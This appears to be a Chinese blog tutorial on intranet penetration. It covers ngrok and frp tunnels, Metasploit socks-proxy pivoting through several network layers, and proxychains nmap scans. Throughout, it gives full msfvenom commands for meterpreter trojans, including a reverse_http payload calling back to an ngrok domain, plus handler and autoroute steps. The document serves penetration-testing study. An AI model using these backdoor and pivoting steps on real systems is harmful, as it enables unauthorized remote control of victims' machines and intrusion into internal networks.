内网安全:Socks 代理 || 本地代理 技术.

Socks 代理又称全能代理,就像有很多跳线的转接板,它只是简单地将一端的系统连接到另外一端。支持多种协议,包括http、ftp请求及其它类型的请求。它分socks 4 和socks 5两种类型,socks 4只支持TCP协议而socks 5支持TCP/UDP协议,还支持各种身份验证机制等协议。其标准端口为1080.


目录:

内网安全:Socks 代理 技术.

两个内网通讯上线( Ngrok )

(1)开通隧道:

(2)下载客户端:

(3)生成一个程序后门:

(4)进行监听:(kali)

两个内网通讯上线( Frp 自建跳板 )

(1)跳板环境搭建:

(2)生成程序后面:

(3)进行监听:(kali)

本地代理:( MSF 跳板多个内网主机系列)

第二层内网代理:

(1)信息收集及配置访问:

(2)开启本地代理:

(3)内网扫描:

(4)浏览器访问:

第三层内网代理:

(1)生成正向程序后门:

(2)进行监听:

(3)信息收集及配置访问:

(4)开启本地代理:

第四层内网渗透:

(1)生成正向程序后门:

(2)进行监听:


代理解决的问题:(1)内网有外网    (2)内网有过滤    (3)内网无外网

两个内网通讯上线( Ngrok )

开通隧道工具:https://www.ngrok.cc/user.html
理解:二个内网主机不能相互连接的,这样就可以通过开通的隧道进行连接.
(开通的隧道就是在外网开通一个域名:当目标访问这个域名,则会将数据返还回来到kali中)

(1)开通隧道:


(2)下载客户端:

解压放到 kali 中:(切换的刚刚下载的文件目录中)(1)./sunny clientid 115735315695        // 执行 ./sunny clientid 隧道的IP


(3)生成一个程序后门:(木马)

msfvenom -p windows/meterpreter/reverse_http lhost=bgxg.free.idcfengye.com lport=80 -f exe -o bgxg.exe


(4)进行监听:(kali)

(1)msfconsole(2)use exploit/multi/handler(3)set payload windows/meterpreter/reverse_http(4)set lhost 192.168.0.106        // 本地的 IP 地址(5)set lport 4444                 // 本地的 端口.(6)exploit


两个内网通讯上线( Frp 自建跳板 )

(1)跳板环境搭建:

需要有自己的服务器,有来搭建跳板.
【服务器 和 控制端】需要下载的工具:https://github.com/fatedier/frp/releases

服务器修改配置文件 frps.ini:
[common]
bind_port = 6677            // 这个端口修改为 服务器 开放的就行启动服务端:【切换在下载的目录并执行】
./frps -c ./frps.ini
控制端修改配置文件 frpc.ini:
[common]
server_addr = 云主机 IP 地址
server_port = 6677                 // frpc 工作端口,必须和上面 frps 保持一致
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 5555                  // 转发给本机的 5555
remote_port = 6000                 // 服务端用 6000 端口转发给本机启动客户端:【切换在下载的目录并执行】
./frpc -c ./frpc.ini

(2)生成程序后面:(木马)

msfvenom -p windows/meterpreter/reverse_tcp lhost=服务器(公网)的IP地址 lport=6000 -f exe -o frp.exe

(3)进行监听:(kali)

(1)msfconsole(2)use exploit/multi/handler(3)set payload windows/meterpreter/reverse_tcp(4)set LHOST 127.0.0.1    (5)set LPORT 5555        // 本机监听的端口【和控制端的一样】(6)exploit然后把程序后门(木马)放在目标主机上执行就行.

本地代理:( MSF 跳板多个内网主机系列)

第二层内网代理:

(1)信息收集及配置访问:

(1)run get_local_subnets            // 获取网络接口(2)run autoroute -p                 // 查看路由地址(3)run autoroute -s 10.0.20.0/24    // 添加地二层内网的路由网段.或(3)run post/multi/manage/autoroute        // 自动添加,目前所有路由网段


(2)开启本地代理:

background                            // 挂起会话如果是msf6,使用代理模板为:use auxiliary/server/socks_proxy如果是msf5,使用代理模板为:use auxiliary/server/socks4a
(1)set srvport 2222        // 设置本地代理端口为2222(2)exploit                 // 运行


(3)内网扫描:

打开 /etc/proxychains4.conf 文件:socks4 192.168.0.106 2222                // 添加 本地的代理和端口

进行扫描:proxychains4 nmap -sT -Pn 10.0.20.0/24 -p 80 -Pn:扫描主机检测其是否受到数据包过滤软件或防火墙的保护.-sT:扫描 TCP 数据包已建立的连接 connect


(4)浏览器访问:


第三层内网代理:

(1)生成正向程序后门:

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=54321 -f exe > 54321.exe


(2)进行监听:

要在和上面一样的 msf 会话中执行.(1)use exploit/multi/handler    (2)set payload windows/x64/meterpreter/bind_tcp(3)set rhost 10.0.20.99                // 第二层内网的 IP 地址(4)set lport 54321                     // 和程序后面(木马)一样的端口(5)exploit


(3)信息收集及配置访问:

(1)run get_local_subnets            // 获取网络接口(2)run autoroute -p                 // 查看路由地址(3)run post/multi/manage/autoroute        // 自动添加,目前所有路由网段.


(4)开启本地代理:

background                            // 挂起会话如果是msf6,使用代理模板为:use auxiliary/server/socks_proxy如果是msf5,使用代理模板为:use auxiliary/server/socks4a

(1)set srvport 6666        // 默认端口6666(2)exploit                 // 运行


第四层内网渗透:

(1)生成正向程序后门:

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=9876 -f exe > 9876.exe


 (2)进行监听:

要在和上面一样的 msf 会话中执行.(1)use exploit/multi/handler    (2)set payload windows/x64/meterpreter/bind_tcp(3)set rhost 10.0.10.110                // 第二层内网的 IP 地址(4)set lport 9876                     // 和程序后面(木马)一样的端口(5)exploit

学习链接:第70天:内网安全-域横向内网漫游Socks代理隧道技术_哔哩哔哩_bilibili

内网安全:Socks 代理 || 本地代理 技术.相关推荐

  1. 内网安全学习(六)—域横向-内网漫游: Socks 代理

    内网安全-域横向内网漫游 Socks 代理隧道技术 1.前置知识: 1)正向与反向连接: 正向就是你去连接被控主机,但由于机器处于内网内,分配的内网ip,无法直接找到,所以需要方向连接,即让主机连接我 ...

  2. 内网渗透建立代理通道(如何攻击目标内网机器?)-Socks代理(゚益゚メ) 渗透测试

    文章目录 搭建靶场 配置虚拟机网络 虚拟机 上线目标1(Target1) Socks代理 简介 正向代理 反向代理 FRP 一层代理 二层代理(多层代理) EW 正向代理 反向代理 二层代理流量转发 ...

  3. 内网linux服务器通过CCproxy代理上网

    内网linux服务器通过CCproxy代理上网 安装CCproxy软件 配置网络代理端口 设置 账号 服务器端 本教程记录了通过局域网内能访问外网的Windows平台,使用CCproxy代理使内网节点 ...

  4. 内网Linux服务器如何通过代理方式访问外网

    在目前5G网络和互联网高速发展的时代,还有云计算的普及,但是考虑到很多安全的因素考虑,在现实工作中,很多时候需要脱离外网进入linux,这样导致工作的效率大幅度减低,下面介绍几种通过代理的方式访问内网 ...

  5. git远程外网地址变内网怎么破(ssh本地端口转发)

    git远程外网地址变内网怎么破(ssh本地端口转发)? 最近给longtubas上了负载均衡,相对来说我们并发并不高,但希望可用性尽可能高,本来打算用不饱和的机器做个lvs集群的, 但IDC说给个额外 ...

  6. 【内网安全】域横向内网漫游Socks代理隧道技术

    代理技术和隧道技术都属于内网穿透,代理主要解决内网里面通信的问题(比如对方在内网,你也在内网,这时候两个内网实现通信就必须要经过代理才能实现,常见工具有frp.ngrok和ew等,ew(earthwo ...

  7. 内网安全-域横向内网漫游Socks代理隧道技术

    因为是两个局域网 当你用kali生成一个后门文件放到目标主机 设置后门的反弹地址时,设置为你的外网地址时,后们会将信息反弹到你的路由器上 设置为内网地址时,又找不到你 案例 1-内网穿透 Ngrok ...

  8. 红蓝对抗之隧道技术第一篇(内网穿透、端口映射端口转发、Netsh端口转发、CS正反向连接多层内网、Burp设置上游代理访问内网、MSF protfwd端口转发/重定向)

    文章目录 隧道应用 端口映射&端口转发 Netsh端口转发 Netsh端口转发meterpreter CS正向连接多层内网 CS反向连接多层内网 Burp设置上游代理访问内网 MSF prot ...

  9. 让AWS虚机访问公司内网资源(SSH反向代理)

    背景说明 今天我要将AWS虚机升级到beta版本并进行一些测试. 由于beta版本只在公司内网提供,因此我需要将升级用的文件手动拷贝到AWS虚机中.原始的方法,很容易理解: 用AWS上能找到的最新版本 ...

最新文章

  1. 第一行代码读书笔记1+常见错误分析
  2. VS2019如何导出exe文件_Win10+VS2019源码编译HDF5(1.10.6)
  3. Eclipse导入项目常见问题----jdk版本问题(有个红色感叹号)01
  4. 手机安装(Fiddler)证书
  5. chk mysql.sh_zabbix监控mysql_MySQL
  6. Windows Server 2012 +WDK7600.16385.1+VS2008驱动开发环境搭建
  7. 程序员为什么需要框架?
  8. Spring+SpringMVC+MyBatis深入学习及搭建(二)——MyBatis原始Dao开发和mapper代理开发(转发同上)...
  9. Python编程利用单纯形法和scipy库对比分析求解线性规划最大值和最优解问题
  10. C++ 指针二维数组, C++二维指针数组笔记
  11. hql中获取前一天的数据_如何使用DNS和SQLi从数据库中获取数据样本
  12. PMP模拟题 | 每日一练,快速提分
  13. ajax submit 文件上传,ajaxSubmit() 上传文件和进度条显示
  14. linux dstat,dstat 用法详解
  15. 杭州/北京内推 | 阿里达摩院招聘视觉生成方向学术实习生(人才计划)
  16. 人工智能项目商业价值,主要体现在哪几个方面?
  17. Leetcode(347)——前 K 个高频元素
  18. Word美化技巧:Word文档怎么设置背景图片?
  19. Neo4j 图数据科学应用 - 图目录和图投影(二)
  20. 大疆2022 “拓疆者” 校园招聘

热门文章

  1. 如果远程计算机运行的是早于,在远程桌面会话,当您连接到远程计算机是运行 Windows Vista SP2 或 Windows Server 2008 SP2 中不正确显示的可视元素...
  2. Python的Numpy库的ndarray对象常用构造方法及初始化方法
  3. Seq2Seq model个人小记
  4. JS获取当前时间并格式化“yyyy-MM-dd HH:mm:ss“
  5. 论文笔记-Applications of Deep Learning in Fundus Images: A Review(1)
  6. 推荐一个好发论文的研究方向
  7. dubbo面试题整理
  8. python getattr_python 知识点:反射 之 getattr()实现以字符串形式导入模块和执行函数...
  9. 【寻找巧妙性质-双指针】 AtCoder - arc098_b Xor Sum 2
  10. 人工智能教程 - 数学基础课程1.5 - 离散数学-3-5 不变式,第二数学归纳法